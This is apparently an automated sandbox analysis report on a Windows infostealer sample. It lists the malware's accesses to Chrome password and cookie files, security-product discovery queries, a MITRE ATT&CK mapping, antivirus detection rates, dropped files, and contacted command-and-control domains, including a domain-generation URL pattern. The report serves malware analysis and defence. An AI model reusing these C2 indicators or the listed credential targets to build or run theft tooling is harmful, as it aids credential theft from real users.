Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

Stealing of Sensitive Information:

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\hihistory
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Replication Through Removable Media1	Windows Management Instrumentation11	DLL Side-Loading1	DLL Side-Loading1	Disable or Modify Tools1	OS Credential Dumping1	System Time Discovery1	Replication Through Removable Media1	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Application Shimming1	Application Shimming1	Deobfuscate/Decode Files or Information1	LSASS Memory	Peripheral Device Discovery11	Remote Desktop Protocol	Man in the Browser1	Exfiltration Over Bluetooth	Encrypted Channel2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Browser Extensions1	Process Injection11	Obfuscated Files or Information2	Security Account Manager	File and Directory Discovery3	SMB/Windows Admin Shares	Data from Local System1	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Bootkit1	Logon Script (Mac)	Install Root Certificate2	NTDS	System Information Discovery157	Distributed Component Object Model	Clipboard Data1	Scheduled Transfer	Application Layer Protocol13	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing1	LSA Secrets	Query Registry2	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	DLL Side-Loading1	Cached Domain Credentials	Security Software Discovery571	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Masquerading1	DCSync	Virtualization/Sandbox Evasion13	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Virtualization/Sandbox Evasion13	Proc Filesystem	Process Discovery3	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Process Injection11	/etc/passwd and /etc/shadow	Remote System Discovery11	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Bootkit1	Network Sniffing	System Network Configuration Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Cyfj6XGbkd.exe	40%	Virustotal		Browse
Cyfj6XGbkd.exe	24%	Metadefender		Browse
Cyfj6XGbkd.exe	59%	ReversingLabs	Win32.Trojan.Phonzy
Cyfj6XGbkd.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	24%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	59%	ReversingLabs	Win32.Trojan.Phonzy
C:\Users\user\AppData\Local\Temp\MSIB2E9.tmp	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\MSIB2E9.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe	8%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	2%	ReversingLabs
C:\Users\user\AppData\Local\Temp\download\atl71.dll	3%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\download\atl71.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll	3%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\download\download_engine.dll	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\download\download_engine.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\download\msvcp71.dll	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\download\msvcp71.dll	3%	ReversingLabs
C:\Users\user\AppData\Local\Temp\download\msvcr71.dll	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\download\msvcr71.dll	3%	ReversingLabs
C:\Users\user\AppData\Local\Temp\download\zlib1.dll	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\download\zlib1.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\xldl.dll	3%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\xldl.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\1611971443428.exe	3%	Metadefender		Browse
C:\Users\user\AppData\Roaming\1611971443428.exe	14%	ReversingLabs	Win32.Infostealer.EdgeCookiesView

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
84CFBA021A5A6662.xyz	1%	Virustotal		Browse
84cfba021a5a6662.xyz	1%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://84cfba021a5a6662.xyz/info_old/g	1%	Virustotal		Browse
http://84cfba021a5a6662.xyz/info_old/g	0%	Avira URL Cloud	safe
http://84cfba021a5a6662.xyz/info_old/e	1%	Virustotal		Browse
http://84cfba021a5a6662.xyz/info_old/e	0%	Avira URL Cloud	safe
http://84cfba021a5a6662.xyz/info_old/w	0%	Avira URL Cloud	safe
https://deff.nelreports.net/api/report?cat=msn	0%	Avira URL Cloud	safe
https://A5D4CE54CC78B3CA.xyz/	0%	Avira URL Cloud	safe
http://84cfba021a5a6662.xyz/info_old/r	0%	Avira URL Cloud	safe
https://twitter.comsec-fetch-dest:	0%	Avira URL Cloud	safe
http://www.interoperabilitybridges.com/wmp-extension-for-chrome	0%	URL Reputation	safe
http://www.interoperabilitybridges.com/wmp-extension-for-chrome	0%	URL Reputation	safe
http://www.interoperabilitybridges.com/wmp-extension-for-chrome	0%	URL Reputation	safe
http://ocsp.pki.goog/gts1o1core0	0%	URL Reputation	safe
http://ocsp.pki.goog/gts1o1core0	0%	URL Reputation	safe
http://ocsp.pki.goog/gts1o1core0	0%	URL Reputation	safe
http://crl.pki.goog/GTS1O1core.crl0	0%	URL Reputation	safe
http://crl.pki.goog/GTS1O1core.crl0	0%	URL Reputation	safe
http://crl.pki.goog/GTS1O1core.crl0	0%	URL Reputation	safe
http://ocsp.pki.goog/GTSGIAG30	0%	Avira URL Cloud	safe
https://logincdn.msauth.net/16.000/Converged_v21033_-0mnSwu67knBd7qR7YN9GQ2.css	0%	Avira URL Cloud	safe
https://logincdn.msauth.net/16.000.28666.10/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc1937	0%	Avira URL Cloud	safe
http://84CFBA021A5A6662.xyz/	0%	Avira URL Cloud	safe
https://logincdn.msauth.net/16.000.28666.10/content/images/ellipsis_white_5ac590ee72bfe06a7cecfd75b5	0%	Avira URL Cloud	safe
http://www.vb-cable.comVBCABLE	0%	Avira URL Cloud	safe
http://pki.goog/gsr2/GTS1O1.crt0	0%	URL Reputation	safe
http://pki.goog/gsr2/GTS1O1.crt0	0%	URL Reputation	safe
http://pki.goog/gsr2/GTS1O1.crt0	0%	URL Reputation	safe
http://ocsp.pki.goog/gsr202	0%	URL Reputation	safe
http://ocsp.pki.goog/gsr202	0%	URL Reputation	safe
http://ocsp.pki.goog/gsr202	0%	URL Reputation	safe
https://pki.goog/repository/0	0%	URL Reputation	safe
https://pki.goog/repository/0	0%	URL Reputation	safe
https://pki.goog/repository/0	0%	URL Reputation	safe
http://www.vb-cable.com	0%	Avira URL Cloud	safe
http://www.interoperabilitybridges.com/wmp-extension-for-chromeJk	0%	Avira URL Cloud	safe
http://crl.pki.goog/gsr2/gsr2.crl0?	0%	URL Reputation	safe
http://crl.pki.goog/gsr2/gsr2.crl0?	0%	URL Reputation	safe
http://crl.pki.goog/gsr2/gsr2.crl0?	0%	URL Reputation	safe
http://pki.goog/gsr2/GTSGIAG3.crt0)	0%	Avira URL Cloud	safe
https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie:	0%	Avira URL Cloud	safe
http://pki.goog/gsr2/GTS1O1.crt0#	0%	Avira URL Cloud	safe
http://84CFBA021A5A6662.xyz/info_old/ddd	0%	Avira URL Cloud	safe
https://aefd.nelreports.net/api/report?cat=bingth	0%	Avira URL Cloud	safe
https://exchangework%04d%02d%02d.xyz/http://changenewsys%04d%02d%02d.xyz/post_info.	0%	Avira URL Cloud	safe
https://www.instagram.comsec-fetch-mode:	0%	Avira URL Cloud	safe
https://twitter.comReferer:	0%	Avira URL Cloud	safe
http://www.interestvideo.com/video1.php	0%	Avira URL Cloud	safe
http://crl.pki.goog/GTSGIAG3.crl0	0%	Avira URL Cloud	safe
https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gt	0%	Avira URL Cloud	safe
http://ocsp.thawte.com0	0%	URL Reputation	safe
http://ocsp.thawte.com0	0%	URL Reputation	safe
http://ocsp.thawte.com0	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
84CFBA021A5A6662.xyz	104.21.23.16	true	false	1%, Virustotal, Browse	unknown
84cfba021a5a6662.xyz	104.21.23.16	true	false	1%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://84cfba021a5a6662.xyz/info_old/g	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://84cfba021a5a6662.xyz/info_old/e	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://84cfba021a5a6662.xyz/info_old/w	false	Avira URL Cloud: safe	unknown
http://84cfba021a5a6662.xyz/info_old/r	false	Avira URL Cloud: safe	unknown
http://84CFBA021A5A6662.xyz/info_old/ddd	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/scripttemplate	ecvD64F.tmp.8.dr	false		high
https://duckduckgo.com/chrome_newtab	Web Data1611971454381.2.dr	false		high
https://duckduckgo.com/ac/?q=	Web Data1611971454381.2.dr	false		high
https://www.messenger.com/	56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	false		high
http://www.msn.com	ecvD64F.tmp.8.dr	false		high
http://www.nirsoft.net	1611971443428.exe, 00000008.00000002.270080121.0000000000198000.00000004.00000010.sdmp	false		high
https://deff.nelreports.net/api/report?cat=msn	ecvD64F.tmp.8.dr	false	Avira URL Cloud: safe	unknown
https://A5D4CE54CC78B3CA.xyz/	56BB1610C0318054.exe, 00000002.00000003.329844310.0000000002AB7000.00000004.00000040.sdmp	false	Avira URL Cloud: safe	unknown
https://twitter.com/ookie:	56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	false		high
https://twitter.comsec-fetch-dest:	56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc13122162a9a46c3b4cbf05ffccde0f	ecvD64F.tmp.8.dr	false		high
http://www.interoperabilitybridges.com/wmp-extension-for-chrome	56BB1610C0318054.exe, 00000002.00000003.277318880.000000000311B000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://ocsp.pki.goog/gts1o1core0	ecvD64F.tmp.8.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://maps.windows.com/windows-app-web-link	ecvD64F.tmp.8.dr	false		high
http://www.msn.com/?ocid=iehp	ecvD64F.tmp.8.dr	false		high
https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=68568119166	ecvD64F.tmp.8.dr	false		high
https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCee0d4d5fd4424c8390d703b105f82c3	ecvD64F.tmp.8.dr	false		high
https://srtb.msn.com/auction?a=de-ch&b=a8415ac9f9644a1396bc1648a4599445&c=MSN&d=http%3A%2F%2Fwww.msn	ecvD64F.tmp.8.dr	false		high
http://crl.pki.goog/GTS1O1core.crl0	ecvD64F.tmp.8.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.messenger.com	56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	false		high
http://www.nirsoft.net/	1611971443428.exe, 1611971443428.exe.2.dr	false		high
http://forms.real.com/real/realone/download.html?type=rpsp_us	56BB1610C0318054.exe, 00000002.00000003.277066236.00000000031B9000.00000004.00000001.sdmp	false		high
http://ocsp.pki.goog/GTSGIAG30	ecvD64F.tmp.8.dr	false	Avira URL Cloud: safe	unknown
https://www.instagram.com/graphql/query/?query_hash=149bef52a3b2af88c0fec37913fe1cbc&variables=%7B%2	56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	false		high
https://logincdn.msauth.net/16.000/Converged_v21033_-0mnSwu67knBd7qR7YN9GQ2.css	ecvD64F.tmp.8.dr	false	Avira URL Cloud: safe	unknown
http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe	56BB1610C0318054.exe, 00000002.00000003.277066236.00000000031B9000.00000004.00000001.sdmp	false		high
https://logincdn.msauth.net/16.000.28666.10/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc1937	ecvD64F.tmp.8.dr	false	Avira URL Cloud: safe	unknown
http://84CFBA021A5A6662.xyz/	56BB1610C0318054.exe, 00000004.00000003.259407630.0000000002F51000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://logincdn.msauth.net/16.000.28666.10/content/images/ellipsis_white_5ac590ee72bfe06a7cecfd75b5	ecvD64F.tmp.8.dr	false	Avira URL Cloud: safe	unknown
https://upload.twitter.com/i/media/upload.jsoncommand=FINALIZE&media_id=	56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	false		high
https://www.instagram.com/	56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	download_engine.dll.2.dr	false		high
http://www.xunlei.com/GET	download_engine.dll.2.dr	false		high
https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC5bdddb231cf54f958a5b6e76e9d8eee	ecvD64F.tmp.8.dr	false		high
http://www.vb-cable.comVBCABLE	Cyfj6XGbkd.exe	false	Avira URL Cloud: safe	unknown
https://upload.twitter.com/i/media/upload.json%dcommand=INIT&total_bytes=&media_type=image%2Fjpeg&me	56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	false		high
https://www.messenger.com/origin:	56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	Web Data1611971454381.2.dr	false		high
http://pki.goog/gsr2/GTS1O1.crt0	ecvD64F.tmp.8.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1	ecvD64F.tmp.8.dr	false		high
https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml	ecvD64F.tmp.8.dr	false		high
https://contextual.media.net/	ecvD64F.tmp.8.dr	false		high
http://ocsp.pki.goog/gsr202	ecvD64F.tmp.8.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://pki.goog/repository/0	ecvD64F.tmp.8.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.twitter.com/1.1/statuses/update.json	56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	false		high
https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9	ecvD64F.tmp.8.dr	false		high
http://www.msn.com/	ecvD64F.tmp.8.dr	false		high
https://upload.twitter.com/i/media/upload.json	56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	false		high
https://www.cloudflare.com/5xx-error-landing	56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000002.00000003.329852304.0000000002ABC000.00000004.00000040.sdmp, 56BB1610C0318054.exe, 00000004.00000003.259393537.0000000002F48000.00000004.00000001.sdmp	false		high
https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC828bc1cde9f04b788c98b5423157734	ecvD64F.tmp.8.dr	false		high
https://twitter.com/compose/tweetsec-fetch-mode:	56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	false		high
http://84CFBA021A5A6662.xyz/info_old/w	56BB1610C0318054.exe, 00000002.00000003.329844310.0000000002AB7000.00000004.00000040.sdmp	false		unknown
https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674	ecvD64F.tmp.8.dr	false		high
http://www.vb-cable.com	Cyfj6XGbkd.exe	false	Avira URL Cloud: safe	unknown
https://www.messenger.com/accept:	56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	false		high
http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/consent/55a804	ecvD64F.tmp.8.dr	false		high
https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3	ecvD64F.tmp.8.dr	false		high
https://contextual.media.net/48/nrrV18753.js	ecvD64F.tmp.8.dr	false		high
http://www.interoperabilitybridges.com/wmp-extension-for-chromeJk	56BB1610C0318054.exe, 00000002.00000003.277318880.000000000311B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.pki.goog/gsr2/gsr2.crl0?	ecvD64F.tmp.8.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://forms.real.com/real/realone/download.html?type=rpsp_use	56BB1610C0318054.exe, 00000002.00000003.277066236.00000000031B9000.00000004.00000001.sdmp	false		high
http://84CFBA021A5A6662.xyz/info_old/g	56BB1610C0318054.exe, 00000002.00000003.329844310.0000000002AB7000.00000004.00000040.sdmp	false		unknown
http://pki.goog/gsr2/GTSGIAG3.crt0)	ecvD64F.tmp.8.dr	false	Avira URL Cloud: safe	unknown
https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0	56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	false		high
https://feedback.googleusercontent.com	56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.259051074.0000000002F74000.00000004.00000001.sdmp	false		high
https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie:	56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.xunlei.com/	download_engine.dll.2.dr	false		high
http://pki.goog/gsr2/GTS1O1.crt0#	ecvD64F.tmp.8.dr	false	Avira URL Cloud: safe	unknown
https://aefd.nelreports.net/api/report?cat=bingth	ecvD64F.tmp.8.dr	false	Avira URL Cloud: safe	unknown
https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0accept:	56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/soap/envelope/	download_engine.dll.2.dr	false		high
https://exchangework%04d%02d%02d.xyz/http://changenewsys%04d%02d%02d.xyz/post_info.	56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location	ecvD64F.tmp.8.dr	false		high
https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.js	ecvD64F.tmp.8.dr	false		high
https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCfd484f9188564713bbc5d13d862ebbf	ecvD64F.tmp.8.dr	false		high
https://curl.haxx.se/docs/http-cookies.html	56BB1610C0318054.exe, 00000002.00000002.334703397.000000000340F000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.262859007.000000000325F000.00000004.00000001.sdmp	false		high
http://www.openssl.org/support/faq.html	download_engine.dll.2.dr	false		high
https://www.instagram.comsec-fetch-mode:	56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.instagram.com/accounts/login/ajax/facebook/	56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	false		high
https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e	ecvD64F.tmp.8.dr	false		high
http://crl.thawte.com/ThawteTimestampingCA.crl0	Cyfj6XGbkd.exe	false		high
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2	ecvD64F.tmp.8.dr	false		high
https://www.instagram.com/sec-fetch-site:	56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	false		high
https://twitter.comReferer:	56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.interestvideo.com/video1.php	56BB1610C0318054.exe, 00000004.00000002.262859007.000000000325F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.instagram.com/accept:	56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	false		high
https://www.messenger.com/login/nonce/	56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	false		high
http://www.youtube.com	56BB1610C0318054.exe, 00000004.00000003.258915262.0000000002F77000.00000004.00000001.sdmp	false		high
https://twitter.com/compose/tweetsec-fetch-dest:	56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	false		high
http://crl.pki.goog/GTSGIAG3.crl0	ecvD64F.tmp.8.dr	false	Avira URL Cloud: safe	unknown
https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gt	ecvD64F.tmp.8.dr	false	Avira URL Cloud: safe	unknown
http://ocsp.thawte.com0	Cyfj6XGbkd.exe	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.vb-audio.com	Cyfj6XGbkd.exe	false		high
https://api.twitter.com/1.1/statuses/update.jsoninclude_profile_interstitial_type=1&include_blocking	56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	false		high
http://store.paycenter.uc.cnmail-attachment.googleusercontent.com	MiniThunderPlatform.exe.2.dr	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.23.16	unknown	United States		13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.1
127.0.0.1

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	346134
Start date:	29.01.2021
Start time:	17:49:31
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 13m 52s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	Cyfj6XGbkd.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	40
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal93.bank.troj.spyw.evad.winEXE@34/38@4/3
EGA Information:	Failed
HDC Information:	Successful, ratio: 58.6% (good quality ratio 55.6%) Quality average: 80.5% Quality standard deviation: 27.2%
HCA Information:	Successful, ratio: 68% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Sleeps bigger than 120000ms are automatically reduced to 1000ms Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, svchost.exe TCP Packets have been reduced to 100 Excluded IPs from analysis (whitelisted): 13.64.90.137, 104.43.139.144, 104.80.28.60, 168.61.161.212, 13.88.21.125, 51.104.144.132, 8.248.131.254, 8.248.119.254, 67.26.73.254, 8.248.117.254, 8.248.123.254, 92.122.213.247, 92.122.213.194, 20.54.26.129, 52.155.217.156, 20.190.159.136, 40.126.31.6, 40.126.31.137, 20.190.159.132, 40.126.31.4, 20.190.159.138, 40.126.31.1, 40.126.31.8, 40.127.240.158 Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, www.tm.lg.prod.aadmsa.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, login.live.com, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, 